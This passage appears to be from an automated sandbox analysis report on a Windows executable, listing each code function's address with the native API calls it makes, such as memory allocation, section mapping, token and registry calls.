                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72647770 RtlAcquireResourceShared,RtlAcquireResourceShared,ZwWaitForSingleObject,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DbgPrintEx,DbgPrintEx,DbgPrintEx,RtlRaiseStatus,0_2_72647770
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264A740 RtlImpersonateSelfEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwSetInformationThread,ZwClose,ZwClose,RtlImpersonateSelfEx,0_2_7264A740
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D174B ZwSetInformationProcess,0_2_726D174B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7270675E ZwAllocateVirtualMemoryEx,0_2_7270675E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72711746 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,0_2_72711746
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A750 ZwCreateFile,0_2_7268A750
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FF752 memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_726FF752
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B720 ZwQuerySecurityAttributesToken,0_2_7268B720
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A720 ZwResumeThread,0_2_7268A720
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D1724 ZwQueryInformationProcess,0_2_726D1724
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FF722 ZwQueryInformationProcess,RtlUniform,0_2_726FF722
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264D730 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose,0_2_7264D730
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A730 ZwTerminateThread,0_2_7268A730
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72672700 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,0_2_72672700
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A700 ZwProtectVirtualMemory,0_2_7268A700
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266B70C ZwSetInformationWorkerFactory,0_2_7266B70C
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271870A RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271870A
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7E0 ZwTraceEvent,0_2_7268A7E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B7E0 ZwRaiseException,0_2_7268B7E0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FE7E6 memset,memset,memset,ZwQueryInstallUILanguage,ZwIsUILanguageComitted,RtlLCIDToCultureName,ZwQueryValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings,RtlInitUnicodeString,ZwQueryValueKey,ZwEnumerateValueKey,RtlCompareUnicodeStrings,RtlCompareUnicodeStrings,0_2_726FE7E6
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FB7FA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,0_2_726FB7FA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B7F0 ZwRaiseHardError,0_2_7268B7F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7F0 ZwPowerInformation,0_2_7268A7F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727187ED RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727187ED
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266F7F9 ZwCreateTimer2,ZwCreateWaitCompletionPacket,ZwAssociateWaitCompletionPacket,ZwClose,0_2_7266F7F9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B7C0 ZwQueryWnfStateNameInformation,0_2_7268B7C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7C0 ZwSetInformationObject,0_2_7268A7C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FF7D3 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_726FF7D3
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D17AA ZwWaitForMultipleObjects,0_2_726D17AA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A7B0 ZwWaitForMultipleObjects,0_2_7268A7B0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727007AD memset,ZwClose,ZwCreateSection,ZwMapViewOfSection,RtlDebugPrintTimes,ZwUnmapViewOfSection,ZwUnmapViewOfSection,ZwClose,0_2_727007AD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72657781 ZwProtectVirtualMemory,0_2_72657781
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D1783 ZwQueryInformationThread,0_2_726D1783
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72665790 RtlNtStatusToDosError,RtlEnterCriticalSection,RtlNtStatusToDosError,RtlCompareMemoryUlong,DbgPrint,DbgPrint,DbgPrint,RtlpNotOwnerCriticalSection,memset,RtlFillMemoryUlong,RtlCompareMemoryUlong,DbgPrint,DbgPrint,DbgPrint,RtlFillMemoryUlong,RtlNtStatusToDosError,memset,RtlFillMemoryUlong,ZwAllocateVirtualMemory,ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_72665790
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B790 ZwQuerySystemInformationEx,0_2_7268B790
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7271878F RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7271878F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264E460 RtlOpenCurrentUser,RtlFormatCurrentUserKeyPath,ZwOpenKey,RtlFreeUnicodeString,RtlOpenCurrentUser,RtlInitUnicodeString,ZwOpenKey,0_2_7264E460
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A470 ZwSetInformationFile,0_2_7268A470
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267547E ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,RtlDebugPrintTimes,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,0_2_7267547E
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72718452 RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_72718452
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264B440 RtlDestroyMemoryZone,RtlAcquireSRWLockExclusive,ZwFreeVirtualMemory,0_2_7264B440
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72647440 RtlProtectHeap,RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlProtectHeap,ZwQueryVirtualMemory,0_2_72647440
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72642440 RtlDeleteTimerQueueEx,RtlAcquireSRWLockExclusive,TpTimerOutstandingCallbackCount,TpReleaseTimer,RtlDeleteTimerQueueEx,RtlDeleteTimerQueueEx,RtlDeleteTimerQueueEx,ZwWaitForAlertByThreadId,0_2_72642440
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A440 ZwOpenThreadToken,0_2_7268A440
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7265044F ZwOpenKey,ZwClose,0_2_7265044F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72688442 ZwAllocateVirtualMemory,memset,RtlEnterCriticalSection,RtlLeaveCriticalSection,0_2_72688442
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7270145F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_7270145F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72658457 RtlImageNtHeaderEx,ZwWow64IsProcessorFeaturePresent,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,0_2_72658457
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267245F ZwAllocateVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwQueryVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlFillMemoryUlong,DbgPrint,DbgPrint,DbgPrint,0_2_7267245F
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A450 ZwQueryInformationThread,0_2_7268A450
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72645420 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,0_2_72645420
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7265A423 RtlEnterCriticalSection,RtlAllocateHeap,RtlLeaveCriticalSection,RtlReAllocateHeap,RtlLeaveCriticalSection,ZwProtectVirtualMemory,RtlLeaveCriticalSection,0_2_7265A423
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267242B ZwQueryVirtualMemory,0_2_7267242B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A430 ZwQueryVirtualMemory,0_2_7268A430
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D1408 ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwClose,0_2_726D1408
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7265740C ZwQueryPerformanceCounter,0_2_7265740C
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72642416 ZwClose,RtlFreeHeap,0_2_72642416
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7270E407 ZwQueryVirtualMemory,ZwProtectVirtualMemory,0_2_7270E407
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A410 ZwQueryInformationToken,0_2_7268A410
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268B410 ZwOpenProcessToken,0_2_7268B410
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267341B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,0_2_7267341B
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726FE4E9 memset,RtlInitUnicodeString,RtlInitUnicodeString,ZwEnumerateValueKey,RtlInitUnicodeString,RtlCompareUnicodeStrings,0_2_726FE4E9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727164FB ZwQueryVolumeInformationFile,RtlAllocateHeap,ZwReadFile,ZwWriteFile,ZwSetInformationFile,RtlFreeHeap,RtlNtStatusToDosError,0_2_727164FB
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726474EA ZwQueryVirtualMemory,ZwProtectVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,0_2_726474EA
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7264E4F4 ZwEnumerateValueKey,0_2_7264E4F4
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A4F0 ZwOpenThreadTokenEx,0_2_7268A4F0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727014EC RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727014EC
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726D34C9 RtlAllocateHeap,ZwOpenKey,ZwClose,ZwQueryValueKey,RtlQueryEnvironmentVariable_U,ZwQueryValueKey,RtlExpandEnvironmentStrings_U,ZwEnumerateValueKey,RtlFreeHeap,RtlFreeHeap,0_2_726D34C9
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A4C0 ZwTerminateProcess,0_2_7268A4C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726ED4C0 memset,RtlEnterCriticalSection,RtlLockHeap,RtlUnlockHeap,RtlLeaveCriticalSection,memset,ZwClose,ZwCreateSection,ZwMapViewOfSection,memset,ZwUnmapViewOfSection,ZwMapViewOfSection,RtlDebugPrintTimes,ZwUnmapViewOfSection,ZwClose,0_2_726ED4C0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_727184CD RtlGetCurrentServiceSessionId,ZwTraceEvent,0_2_727184CD
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726504A0 RtlCheckTokenMembershipEx,ZwOpenThreadTokenEx,ZwOpenProcessTokenEx,ZwDuplicateToken,ZwClose,RtlCreateSecurityDescriptor,RtlSetOwnerSecurityDescriptor,RtlSetGroupSecurityDescriptor,RtlCreateAcl,RtlInitializeSidEx,RtlSetDaclSecurityDescriptor,ZwAccessCheck,ZwClose,RtlInitializeSidEx,RtlCheckTokenMembershipEx,0_2_726504A0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A4A0 ZwUnmapViewOfSection,0_2_7268A4A0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_726794B0 LdrpResGetMappingSize,RtlImageNtHeaderEx,ZwQueryVirtualMemory,LdrpResGetMappingSize,RtlGetCurrentServiceSessionId,LdrpResGetMappingSize,RtlGetCurrentServiceSessionId,0_2_726794B0
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72657488 RtlAcquireSRWLockExclusive,RtlAllocateHeap,memcpy,ZwSetInformationProcess,RtlReleaseSRWLockExclusive,RtlAllocateHeap,RtlFreeHeap,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,RtlFreeHeap,0_2_72657488
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7266D490 ZwReleaseWorkerFactoryWorker,_allshl,RtlAcquireSRWLockExclusive,memmove,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,0_2_7266D490
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267D499 RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,0_2_7267D499
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72646570 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,0_2_72646570
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_72715567 ZwDelayExecution,0_2_72715567
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7267A570 RtlDeleteCriticalSection,RtlAcquireSRWLockExclusive,RtlDeleteCriticalSection,RtlDeleteCriticalSection,ZwClose,RtlDeleteCriticalSection,0_2_7267A570
                          Source: C:\Users\user\Desktop\y98WYYcJ2U.exeCode function: 0_2_7268A570 ZwOpenSection,0_2_7268A570
                          Source: C:\Users\user\Desktop\y